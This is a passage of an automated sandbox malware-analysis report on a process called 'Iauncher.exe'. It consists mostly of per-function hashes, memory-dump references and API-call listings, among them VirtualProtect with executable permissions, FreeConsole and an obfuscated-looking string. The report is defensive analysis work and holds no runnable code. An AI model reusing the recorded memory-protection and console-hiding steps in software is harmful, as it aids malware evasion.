Function 05CCDCE2 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85128e3c30e59b12f1148714b24d326f8854b85e5986304ea422cc1400a51300
Instruction ID: 7575f6491cc9f889967d2dce4dcabd42c17c86d3273dbb3d0225c11950832fc3
Opcode Fuzzy Hash: 85128e3c30e59b12f1148714b24d326f8854b85e5986304ea422cc1400a51300
Instruction Fuzzy Hash: 3CF0FFA2A4E3C05ED706836088183753FA4AB43208F2AD4EFD00ECF193D12BD587C362

Uniqueness

Uniqueness Score: -1.00%

Function 05CCB8AC Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a127eebb0363afefc309e7cb16eb6c9afdcfd9a5e14d386fabc56e530c35a5f
Instruction ID: 64280b402a79226cba1e8db35989e971185d14f5862e0d97f46431dc8471bffc
Opcode Fuzzy Hash: 1a127eebb0363afefc309e7cb16eb6c9afdcfd9a5e14d386fabc56e530c35a5f
Instruction Fuzzy Hash: 27F0F6323002546BC7015AAA9C949BF7FABDBC9351B00882AFA5ACA240CE70DC11A7E0

Uniqueness

Uniqueness Score: -1.00%

Function 05CC9B50 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3f7ff008e51e47c117cdbabd5838745cd118d3151a50f2d2e1191091dba9c9
Instruction ID: f1b48c2857b89dd6f8df95d4e08506d29f5ec821833425dc70a290ef59be3fe8
Opcode Fuzzy Hash: 2c3f7ff008e51e47c117cdbabd5838745cd118d3151a50f2d2e1191091dba9c9
Instruction Fuzzy Hash: 1CF09030E50209ABCB00EBA4DC587EDBB70FFC2340F5052A5E11537290EB746BA8CA51

Uniqueness

Uniqueness Score: -1.00%

Function 05CC872C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3084e8ab8c1ad2a695b510d089b19724fbcf715021400839531d836f77ec42
Instruction ID: 8303476b16619f5c2443a82f5501d9764d8864d9f2b423aa7d9894e61927f277
Opcode Fuzzy Hash: de3084e8ab8c1ad2a695b510d089b19724fbcf715021400839531d836f77ec42
Instruction Fuzzy Hash: 28F09030E50309EBCB00EBA5D8646FEBB74FF82340F405A6AE10536290EB70AA54C755

Uniqueness

Uniqueness Score: -1.00%

Function 05CCD7DF Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac239f3df78c6a24e60f693d78d95feff652d9ff2e343c2e31a9187deb86e543
Instruction ID: 35d665f88760e7146f4e95610bc9e1168f0d49551837ced42cbc8ec16fb6aa28
Opcode Fuzzy Hash: ac239f3df78c6a24e60f693d78d95feff652d9ff2e343c2e31a9187deb86e543
Instruction Fuzzy Hash: EEE02B323406107BD3115A49EC01F9A7BC9DFE4712F04452AF108D72D4CAA9B9058794

Uniqueness

Uniqueness Score: -1.00%

Function 05CCCE9E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76efb86478ed585aa3c42f5ad032f6160e85d6d8c10c8dcfeb221de0f3c143d
Instruction ID: 5748827effcf0c1d435b149f7131479dbd065e98559d28e2a70653bb5df9512f
Opcode Fuzzy Hash: b76efb86478ed585aa3c42f5ad032f6160e85d6d8c10c8dcfeb221de0f3c143d
Instruction Fuzzy Hash: A3E0E535B001049FCB08CF9ED884DAEB7F6FB8D224B2180ADE619D7321E631AD058A90

Uniqueness

Uniqueness Score: -1.00%

Function 05CCD7F0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef86674533530fe2916a4b974ad3b0f7547988e071ab96b91a4e10e2ae355550
Instruction ID: 4716dbbf8fbb6902d36eb77815aa4eeab559f1bac173a2db2129d15eff4c6bee
Opcode Fuzzy Hash: ef86674533530fe2916a4b974ad3b0f7547988e071ab96b91a4e10e2ae355550
Instruction Fuzzy Hash: 49E026323003146BC711964EEC00F9FBBCEDBD8B21F044429F208CB294CAE17C418394

Uniqueness

Uniqueness Score: -1.00%

Function 05CCB948 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de7958f5c5b95f708c75905b9be9dcd979442eeaed5d2393557ca78a2a3e3dbd
Instruction ID: 8577309fbe1c86c063ac1564dadbcc998df664ffb8be4f6423f30822e613e500
Opcode Fuzzy Hash: de7958f5c5b95f708c75905b9be9dcd979442eeaed5d2393557ca78a2a3e3dbd
Instruction Fuzzy Hash: 79C02B502583C093C144D3184480729DEE09FB1300FC0CCAEE58946101C050C812D732

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 09F11400 Relevance: 1.6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

Strings

pbq, xrefs: 09F116D7

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 46c1c370610e61ce7712ecdb2fc9944ca0b0635ec8fe12ddaccb0b4455a6eb01
Instruction ID: 6dafe86bc34bd9c9765617e2f21dbec90ecdb508dcd8edca0f14c5e8d3d2f520
Opcode Fuzzy Hash: 46c1c370610e61ce7712ecdb2fc9944ca0b0635ec8fe12ddaccb0b4455a6eb01
Instruction Fuzzy Hash: 4F02E375A00218DFDB15CFA9C984E99BBB2FF49304F1581A9E609AB332D731E991DF40

Uniqueness

Uniqueness Score: -1.00%

Function 04E0B650 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

pbq, xrefs: 04E0B8F3

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: d05382769f81f0451c9996a7edc51df37b50750d2d8aaff2ab84ba332a0ceb16
Instruction ID: baf2f8ce2f3fd356000ccca45be20026b35f0ee7c6b5edb26669080e017d93c0
Opcode Fuzzy Hash: d05382769f81f0451c9996a7edc51df37b50750d2d8aaff2ab84ba332a0ceb16
Instruction Fuzzy Hash: 1202DF75A00218DFDB15CFA9C984E99BBB2FF49304F1591A9E509AB372DB31E891DF00

Uniqueness

Uniqueness Score: -1.00%

Function 09F1344C Relevance: .9, Instructions: 866COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bb975556bce8aa3c26d54647bca61196034ce3577d63b7042647441aff3425
Instruction ID: 58fe17de4a0aa6b42a1eab568fa5160ecba577ec9ac008a3c2b1b03826e6fee7
Opcode Fuzzy Hash: e2bb975556bce8aa3c26d54647bca61196034ce3577d63b7042647441aff3425
Instruction Fuzzy Hash: B192C335910229DFCB21EF64C888ADDBBB5FF89300F0592E9E509A7260DB719AD5DF40

Uniqueness

Uniqueness Score: -1.00%

Function 07927770 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cccfb292b539ee9f9b9aeca5047a5ec043cefd89bba048e51253199a746d199
Instruction ID: fb1fef86815f07773f2a5d495bedc68960181d90c3a31604ad67072e4337542d
Opcode Fuzzy Hash: 0cccfb292b539ee9f9b9aeca5047a5ec043cefd89bba048e51253199a746d199
Instruction Fuzzy Hash: 8F027F75D012698FDB60DFA9C880BDDBBF1BF49300F1081AAE948B7250EB709A85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04E023F8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc10585d04a28db000fd99560845d2c2cecf7fab03b540325b293b83afbb639
Instruction ID: 3c4e005db0c20e4264aaf866df1ccbc1903b7c8d726d9d9e39843360aaedae87
Opcode Fuzzy Hash: 0dc10585d04a28db000fd99560845d2c2cecf7fab03b540325b293b83afbb639
Instruction Fuzzy Hash: EE1297B2C8AB468BD390CF66E88C1893BB1B745318FD1CA09D3665B2E5D7B4116ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 0792776E Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caefc4de42c0a0ae5ab8385703f15e1f787b4477d1e0d554b1ae5aecd0fc0f1a
Instruction ID: b8f0c0507d1f5c6e28ec6ae2496cf43bce0672460ffba3d9bde2c503d0367f09
Opcode Fuzzy Hash: caefc4de42c0a0ae5ab8385703f15e1f787b4477d1e0d554b1ae5aecd0fc0f1a
Instruction Fuzzy Hash: F4F19F75D01269CFDB60DFA9C880BDDBBB5BF59300F1085AAE908B7250EB709A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04E0048C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbb349dd93a1fe1a60bdb9ca02d566c1f5b469f924a669c39f038f8af3e7eece
Instruction ID: 7420dcf52994fc0eef8f6e008c696da14836c8c84dab8d97e8dd7d192f63c470
Opcode Fuzzy Hash: bbb349dd93a1fe1a60bdb9ca02d566c1f5b469f924a669c39f038f8af3e7eece
Instruction Fuzzy Hash: 40A18E32E002098FCF15DFB4D8845AEB7B2FF85305B15956AE815AF2A1EB31E995CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04E023A0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4138968cee714a9a6ed1926b5d3f4e42249c424d7336b3d35b2a68975c2f23dc
Instruction ID: 1a0335f30365eb683cb4967b95a781f4c87f52013a3f5d6a0af7b0fae6897409
Opcode Fuzzy Hash: 4138968cee714a9a6ed1926b5d3f4e42249c424d7336b3d35b2a68975c2f23dc
Instruction Fuzzy Hash: 8AC12EB1C8AB468BD790CF66E88C1897BB1FB85314F91CB09D3616B2D1DBB41466CF44

Uniqueness

Uniqueness Score: -1.00%

Function 04E023E8 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f15e21b3ee03f450489a99a002b9d7b02427463255c7eb30d1037edd9296b63
Instruction ID: f8a31680908e5f3860b762031f9bee94b4b1cc2692f7593d42268edf17816e57
Opcode Fuzzy Hash: 8f15e21b3ee03f450489a99a002b9d7b02427463255c7eb30d1037edd9296b63
Instruction Fuzzy Hash: 51C12FB1C9AB468BD790CF26E88C1897BB1BB85314F91CB09D3616F2D1DBB4146ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 04E0B640 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c20f762f30144abfec92d56ecf82250cc74f295af3a3902fe137639ac4f0c74
Instruction ID: fba6a2f4c928f8dfef245c510d3569a8522005c10a11c9e4013c6445d4cd22a8
Opcode Fuzzy Hash: 5c20f762f30144abfec92d56ecf82250cc74f295af3a3902fe137639ac4f0c74
Instruction Fuzzy Hash: 1051D675E012188FDB18CFAAD9406DDBBF2FF89304F14D16AD518AB264EB30A985DF50

Uniqueness

Uniqueness Score: -1.00%

Function 09F113F0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f6023fe93d7b2444200ae053dcd87ff1040f3635ab80e802ebdea732dc89c4
Instruction ID: 559416cd55cd19bab6f8d56fb4ad85ca782e2065cc0ac79df105c2e0f650a295
Opcode Fuzzy Hash: d8f6023fe93d7b2444200ae053dcd87ff1040f3635ab80e802ebdea732dc89c4
Instruction Fuzzy Hash: 2951C675E052188FDB18CFAAD940ADDFBF6BF89300F14D1AAD509AB265EB309945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04E0A070 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a129d05cd3cbb160c6c1e1cc2e67844a31cbe9d4ea582dd02840ebca4d7675dd
Instruction ID: 61bf49332a7c23f6f9d02b1fc21b34db8adbca5947d0246a1755b575c83c9b9f
Opcode Fuzzy Hash: a129d05cd3cbb160c6c1e1cc2e67844a31cbe9d4ea582dd02840ebca4d7675dd
Instruction Fuzzy Hash: 6751C775E01218CFEB14CF6AD940BD9BBF2AF99304F04D1B9D508AB264EB309A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05CB78F8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb7bba7151710abdda05d09e191384f415e0f543dd4b523bd2beb4ad039f9a9
Instruction ID: 9c941de4d7a4a72c8dd798eb2280a555f4307e40ca6ebbb034497b6b8ad666b0
Opcode Fuzzy Hash: dbb7bba7151710abdda05d09e191384f415e0f543dd4b523bd2beb4ad039f9a9
Instruction Fuzzy Hash: 86411670E002198FDB04DFA8D594BEEBBF1FB89301F118469E815B7291C778EA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05CB7908 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ffecf775c02444b2a1b88b450b938d32ae11c0f4c4f43ca369a09b34a7c7eee
Instruction ID: bd167458fe47c5a72622cc7253a7061236411037f3d8fe80fe98b6f70bf5905c
Opcode Fuzzy Hash: 6ffecf775c02444b2a1b88b450b938d32ae11c0f4c4f43ca369a09b34a7c7eee
Instruction Fuzzy Hash: E5310774E002198FDB04DFA8D584BEEBBF1FB49301F119469E911B7290C778DA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05CB7A41 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f90e2d9875cd378024367dcdb4a51512aedccac5887dd50e2db6dffa25991222
Instruction ID: 99daf1e3b60c7ad5653d3a9afe01e488671b28abb429f1903f63efc946b1b979
Opcode Fuzzy Hash: f90e2d9875cd378024367dcdb4a51512aedccac5887dd50e2db6dffa25991222
Instruction Fuzzy Hash: 07F096B1F002089FD740DFA8D840ADEFBF8EB4A324F1055A5D908E7351D675ED418B61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Iauncher.exePID: 7404, Parent PID: 2448COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	50

Executed Functions

Function 00F2A789 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
Instruction ID: 8a8b0bcc108814e8a7c180c98ff789f2ca0ae39e498eb02318fa155a2e198f5e
Opcode Fuzzy Hash: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
Instruction Fuzzy Hash: 99E08C72912238EBCB15DBC8D90498AF3FCEB45B10B1108A6F502D3200C274DE00D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F20E87 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
Instruction ID: e4c1697a60ac69fe5df0f3b007600a6e5d7714c41e97d13003ae9764ffd513e3
Opcode Fuzzy Hash: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
Instruction Fuzzy Hash: A2C08C75410E208BCF298910A371BA63364A3D6792F801CDCC4420F743D91E9CC2F601

Uniqueness

Uniqueness Score: -1.00%

Function 00F259BC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,A03C9F43,?,00F25AC9,?,?,00000000,00000000), ref: 00F25A7D

Strings

api-ms-, xrefs: 00F25A13
ext-ms-, xrefs: 00F25A27

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 4a356bf8f6a7dc8c2a379a8b87ba1c43ea808436c91fc4178f92982e6a1226f1
Instruction ID: a81d9b4ab31e24acbecdb6f3f72c525667567b1f240beb1a0e090a895292b16a
Opcode Fuzzy Hash: 4a356bf8f6a7dc8c2a379a8b87ba1c43ea808436c91fc4178f92982e6a1226f1
Instruction Fuzzy Hash: 4D21E772E41635EBCB219B64FC86A5A7769DB41F70F150220E919E7290D738FD04FAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00F269BB Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00F26A42
__alloca_probe_16.LIBCMT ref: 00F26B03
__freea.LIBCMT ref: 00F26B6A

Part of subcall function 00F245C0: HeapAlloc.KERNEL32(00000000,00F14449,?,?,00F18DF4,?,?,?,?,?,00F121CC,00F14449,?,?,?,?), ref: 00F245F2

__freea.LIBCMT ref: 00F26B7F
__freea.LIBCMT ref: 00F26B8F

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 6da1c53396312c250be5d3d55c111846372d20309b1811c9bd555ce269bcdca9
Instruction ID: 906304bab35192d9b238e1f65797909ad5d752014da638fc4667a60fc7cc61ee
Opcode Fuzzy Hash: 6da1c53396312c250be5d3d55c111846372d20309b1811c9bd555ce269bcdca9
Instruction Fuzzy Hash: 7A51E973A01226AFEF259F64EC81EBB37A9EF44760B154129FC08D7150EB75CD50ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F33416 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F11F47: _strlen.LIBCMT ref: 00F11F5F

VirtualProtect.KERNELBASE(00F8C030,000004AC,00000040,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00F33468
FreeConsole.KERNELBASE ref: 00F3346E

Strings

006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 00F33427

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ConsoleFreeProtectVirtual_strlen
String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
API String ID: 1248733679-32248209
Opcode ID: a73ef8ba50d5c4368ec00bdcf084cbee9af81699d0b068b70b6476f0e14ff03b
Instruction ID: 0bc46921a356df933d7868d702f4a7f9cc7f34a82e0226d1f4912b7f98e562ab
Opcode Fuzzy Hash: a73ef8ba50d5c4368ec00bdcf084cbee9af81699d0b068b70b6476f0e14ff03b
Instruction Fuzzy Hash: F301AD71B002089BDB08FBB4ED06BEE77A4AF04760F018125E601E71C1EF78AA05AB55

Uniqueness

Uniqueness Score: -1.00%

Function 00F20E13 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00F20E0D,00000000,00F1AAD2,?,?,A03C9F43,00F1AAD2,?), ref: 00F20E24
